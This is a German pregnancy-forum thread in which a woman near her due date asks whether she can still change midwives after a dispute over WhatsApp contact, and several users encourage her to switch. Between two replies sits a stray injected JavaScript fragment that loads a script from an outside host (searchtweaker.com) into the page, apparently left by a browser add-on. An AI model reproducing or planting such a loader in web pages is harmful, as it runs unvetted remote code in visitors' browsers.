Suchen Menü

Jetzt noch die Hebamme wechseln?... *sorry lang*

Hallo ihr Lieben,

ich brauche mal eure Meinung, bzw. Erfahrungen.

An dem neuen Wohnort habe ich mich rechtzeitig um meine Beleghebamme gekümmert. Es sind eigentlich zwei, da sie in 2-er Teams arbeiten, um eine bessere Versorgung bieten zu können. Es ist jedoch so, dass ich mich bis heute nicht richtig wohl bei denen fühle. Irgendwie bekomme ich kein richtiges Vertrauensverhältnis zu den Beiden. Hatte bis jetzt auch nur je eine VU bei den beiden "Mädels". Heute ist noch etwas vorgefallen, was mich richtiggehend geärgert hat... Ich habe von den beiden je eine mobilnummer bekommen und wollte heute eine VU verschieben - habe eine Nachricht via whatsapp geschickt (hätte auch ne SMS oder Mail schicken können, wollte nicht so spät anrufen, auch nicht am Sonntag), da habe ich prompt einen Hinweis bekommen, ich soll doch bitte nicht auf diesem "privaten" Wege mit ihr kommunizieren  =-O Ok... Wir sind keine beste Freundinnen, schon klar, doch sie hat mir doch ihre Tel.-Nr. gegeben??? Und ist es nicht privat, wenn ich in ca. 5Wo entbinde und sie dabei ist??? Unter einem Vertrauensverhltnis verstehe ich was anderes...bin enttäuscht... ich selbst arbeite im "Service" und bestehe auf meinem privaten Freiräumen am WE, deswegen habe ich ein privates und ein dienstl. Handy, welches nur Werktags an ist... Egal... Die Chemie stimmt halt nicht...

Darf ich mir noch eine andere Hebamme suchen, (ich weiß, es ist sehr knapp, aber wenn ich mir überlege, dass sie mich auch noch nach der Geburt betreuen soll....) Weiß eine von euch wie das Ganze von der KK gehandhabt wird? 

LG + schönes WE

Bisherige Antworten

Re: Jetzt noch die Hebamme wechseln?... *sorry lang*

Da wird nix gehandhabt. klar kannst du wechseln, jederzeit! Würde ich schnellstens und den anderen ggü ehrlich sein, dass es nicht passt

 

lg

Re: Jetzt noch die Hebamme wechseln?... *sorry lang*

Ehrlich sowieso... Ich habe ja noch gehofft, wir würden uns noch "näher" kommen und das Vertrauen würde wachsen... Rufe mal am Mo bei den Hebammen und meiner KK an...

Re: Jetzt noch die Hebamme wechseln?... *sorry lang*

Huhu,

vielleicht ist das auch ein Missverständnis. Wie alt ist die Hebamme denn? Evtl. empfindet sie Whatsapp halt als rein privates Freizeitkommunikationsmittel, im Gegensatz zu dir. Aber in dem Fall würde ich das ansprechen und versuchen zu klären.

Wenn du jedoch insgesamt das Gefühl hast, die Chemie stimmt nicht, würde ich schon wechseln, denn mit den beiden hast du ja noch ziemlich intimen Kontakt (Untersuchungen...) und ich glaube im Wochenbett kann man es nicht brauchen, mit Leuten - egal wem - in angespannter Art Kontakte zu haben.

 

Liebe Grüße

Anja

id="FoxLingoJs" type="text/">// Liebe rLi(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); //

Re: Jetzt noch die Hebamme wechseln?... *sorry lang*

Wenn du dich unwohl fühlst würde ich wechsel auch wenn es recht kurz ist aber bei der Geburt und auch danach ist es schön wenn da jemand ist dem man vertrauen kann.

Re: Jetzt noch die Hebamme wechseln?... *sorry lang*

Huhu Elena,

also ich würde mir eine neue suchen, sollte ich solche Bedenken haben, wie Du sie jetzt hast.

Denn wenn diese Hebammen auch die Nachsorge übernehmen, dann solltest Du wirklich ein gutes Gefühl haben. Die Nachsorge selbst ist ja auch schon sehr intim und das geht sonst nicht.

Und was das WhatsApp angeht, da muss ich sagen, WENN sie Dir schon ihre Handynummer gibt und Dir nicht sagt wie der Kontakt auszusehen hat, dann würde ich genauso arbeiten und die einfachste Kommunikationsart auswählen.

Und wenn ihr das nicht passt, dann sollte sie sich überlegen, warum sie sich dann kein Geschäftshandy angeschafft hat :DEVIL:

Naja, auf so einer Basis, wie gesagt, könnte ich kein Vertrauen aufbauen.

LG Shali

Ich finde, das Vertrauen ist das A und O. Wie sollst Du Dich denn sonst unter

...

der Geburt fallen lassen???? Das ist ja die Voraussetzung, um dich fallen zu lassen, ganz in Dich zu gehen, bei Dir zu sein und die Umgebung auszublenden!!!! 

Es tut mir leid das das so ist bei Dir. Ich würde dann sogar lieber im KKH ohne Beleghebamme entbinden, als wenn die Chemie nicht stimmt....da besteht dann die Chance, auf eine Hebamme zu treffen, der Du vertraust.

War gestern mit ganz leichten Blutungen kurz im KKH und die Hebamme auf die getroffen bin....bei der hätte ich sofort entbunden!:KISSING:Alles Gute und nimm das nicht so hin sondern wechsel noch!

GlG Uta

Re: Jetzt noch die Hebamme wechseln?... *sorry lang*

Klar, warum nicht? Die Chemie stimmt nicht und warum solltest Du da einen faulen Kompromiss eingehen, besonders wenn es um eine ganz spezielle Phase in Deinem Leben geht? Ich würde ein paar andere Hebis kontaktieren und dann wirst Du schnell herausfinden mit welcher Du "kannst" und mit welcher nicht. Du wirst die Entscheidung sicher nicht bereuen! Viel Glück dabei!

Lg, Conny

Meistgelesen auf 9monate.de
Rat und Hilfe zur Bedienung
Übersicht aller Foren

Mit der Teilnahme an unseren interaktiven Gewinnspielen sicherst du dir hochwertige Preise für dich und deine Liebsten!

Jetzt gewinnen